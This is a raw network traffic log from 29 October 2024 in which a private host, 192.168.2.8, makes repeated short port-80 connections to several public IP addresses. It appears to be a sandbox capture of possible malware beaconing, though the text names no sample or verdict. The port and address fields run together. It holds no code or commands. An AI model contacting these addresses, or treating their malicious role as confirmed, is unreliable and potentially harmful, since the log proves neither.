                                                                                                                                Oct 29, 2024 16:54:55.809921980 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.810192108 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:56.164043903 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.182941914 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.188472033 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:57.188580990 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.199455023 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.205219984 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:57.205493927 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.142385006 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.195056915 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:58.318581104 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.318834066 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:58.710755110 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.729924917 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.736437082 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:59.736588955 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.743482113 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.749234915 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:00.676203012 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:00.730026007 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.104195118 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:01.104343891 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.104665995 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:01.104705095 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.105470896 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.110799074 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.143233061 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.150424957 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.150536060 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.161556959 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.166946888 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.999253988 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:07.054445028 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:07.340338945 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:07.340506077 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:07.664009094 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.685894012 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.691378117 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:08.691519976 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.701910973 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.707333088 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.931350946 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.931967974 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.932012081 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:09.932327986 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.932375908 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.210751057 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.984937906 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:10.985034943 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.985960960 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:10.990006924 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.229927063 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.273473978 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:11.278081894 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.289499998 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.295202971 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:11.295295954 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.115180016 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.160258055 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:12.450161934 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.450376034 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:12.804591894 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.823796988 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.829236031 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:13.829302073 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.837423086 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.842845917 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:14.693185091 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:14.838028908 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.042315006 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:15.046088934 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.050494909 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.055984020 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.143553972 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.149003029 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.149071932 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.164558887 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.169948101 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.852406979 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.980036020 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:21.196187019 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:21.196538925 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:21.679536104 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.698820114 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.704377890 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:22.704493999 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.715728998 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.721326113 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.398262978 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.476368904 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:23.738148928 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.738405943 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:24.226497889 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.245769024 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.251940012 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.252049923 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.264614105 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.270072937 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.270199060 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.959002018 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:26.007617950 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:26.300317049 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:26.306119919 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:26.773426056 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.793939114 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.800713062 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:27.802037001 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.809933901 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.815628052 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:28.497112989 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:28.616460085 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:28.834345102 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:28.834453106 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:28.835737944 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:28.841178894 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:33.929929972 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:33.935455084 CET8049729199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:33.935532093 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:33.945928097 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:33.951792955 CET8049729199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:34.574779034 CET8049729199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:34.574799061 CET8049729199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:34.574846029 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:35.035836935 CET8049729199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:35.035893917 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:35.460844994 CET4972980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:36.479774952 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:36.704883099 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:36.705032110 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:36.717390060 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:36.723062038 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:37.433291912 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:37.433309078 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:37.433325052 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:37.433387041 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:37.433387995 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:37.778143883 CET8049730199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:37.781246901 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:38.226732016 CET4973080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:39.327150106 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:39.332665920 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:39.332741022 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:39.493612051 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:39.499234915 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:39.500035048 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:40.087987900 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:40.088025093 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:40.088180065 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:40.088213921 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:40.088277102 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:40.417989016 CET8049731199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:40.421117067 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:41.007776976 CET4973180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:42.149945974 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:42.155441999 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:42.155580044 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:42.173944950 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:42.179418087 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:42.781121016 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:42.781181097 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:42.781295061 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:43.253509998 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:43.253619909 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:43.254672050 CET4973280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:55:43.260077000 CET8049732199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:48.797230005 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:48.803664923 CET8049733163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:48.803735018 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:48.818051100 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:48.823390961 CET8049733163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:49.707384109 CET8049733163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:49.707557917 CET8049733163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:49.707681894 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:49.860733032 CET8049733163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:49.862060070 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:50.321959972 CET4973380192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:51.339413881 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:51.345032930 CET8049734163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:51.345149040 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:51.359780073 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:51.365901947 CET8049734163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:52.267349005 CET8049734163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:52.267368078 CET8049734163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:52.267513037 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:52.387032032 CET8049734163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:52.387120008 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:52.867069960 CET4973480192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:53.888081074 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:53.895020008 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:53.895124912 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:53.905730009 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:53.913412094 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:53.913445950 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:54.805387020 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:54.805699110 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:54.805741072 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:54.993230104 CET8049735163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:54.993292093 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:55.413958073 CET4973580192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:56.433474064 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:56.439424038 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:56.439524889 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:56.447685957 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:56.453449011 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:57.317842960 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:57.317871094 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:57.317995071 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:57.459660053 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:57.459769011 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:57.460844040 CET4973680192.168.2.8163.44.176.12
                                                                                                                                Oct 29, 2024 16:55:57.466177940 CET8049736163.44.176.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:02.571183920 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:02.576550961 CET8049737195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:02.576616049 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:02.589799881 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:02.595051050 CET8049737195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:03.415945053 CET8049737195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:03.460799932 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:03.754133940 CET8049737195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:03.754339933 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:04.104073048 CET4973780192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:05.121498108 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:05.126969099 CET8049738195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:05.127051115 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:05.139717102 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:05.145041943 CET8049738195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:06.013858080 CET8049738195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:06.070209026 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:06.356308937 CET8049738195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:06.356389046 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:06.648401976 CET4973880192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:07.668417931 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:07.673763037 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:07.673866987 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:07.682970047 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:07.688620090 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:07.688653946 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:08.795032978 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:08.796650887 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:08.796705008 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:08.883111954 CET8049739195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:08.883164883 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:09.195334911 CET4973980192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:10.216123104 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:10.221565962 CET8049740195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:10.221662998 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:10.230237961 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:10.235677004 CET8049740195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:11.066350937 CET8049740195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:11.117094040 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:11.403826952 CET8049740195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:11.403939962 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:11.405400038 CET4974080192.168.2.8195.110.124.133
                                                                                                                                Oct 29, 2024 16:56:11.411257982 CET8049740195.110.124.133192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:16.452013969 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:16.459522963 CET804974167.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:16.460236073 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:16.476011992 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:16.481997013 CET804974167.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:17.162269115 CET804974167.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:17.210819960 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:17.507817030 CET804974167.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:17.507860899 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:17.978009939 CET4974180192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:19.032890081 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:19.038419962 CET804974267.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:19.038492918 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:19.059444904 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:19.064807892 CET804974267.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:19.730755091 CET804974267.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:19.790010929 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:20.076436043 CET804974267.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:20.076564074 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:20.570302963 CET4974280192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:21.614080906 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:21.620026112 CET804974367.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:21.620229959 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:21.633569956 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:21.639202118 CET804974367.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:21.639241934 CET804974367.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:22.304447889 CET804974367.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:22.352555037 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:22.644002914 CET804974367.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:22.644079924 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:23.148792982 CET4974380192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:24.169025898 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:24.175851107 CET804974467.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:24.178175926 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:24.193042040 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:24.199089050 CET804974467.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:24.861367941 CET804974467.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:24.913954020 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:25.204220057 CET804974467.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:25.204334021 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:25.205169916 CET4974480192.168.2.867.223.117.142
                                                                                                                                Oct 29, 2024 16:56:25.211308956 CET804974467.223.117.142192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:30.646805048 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.653558969 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:30.653629065 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.667268038 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.673484087 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.587364912 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.634020090 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:31.755883932 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.756062984 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:32.179680109 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.202667952 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.208163023 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:33.208231926 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.223953962 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.229746103 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:34.132483006 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:34.179692984 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:34.301268101 CET8049746107.163.130.253192.168.2.8
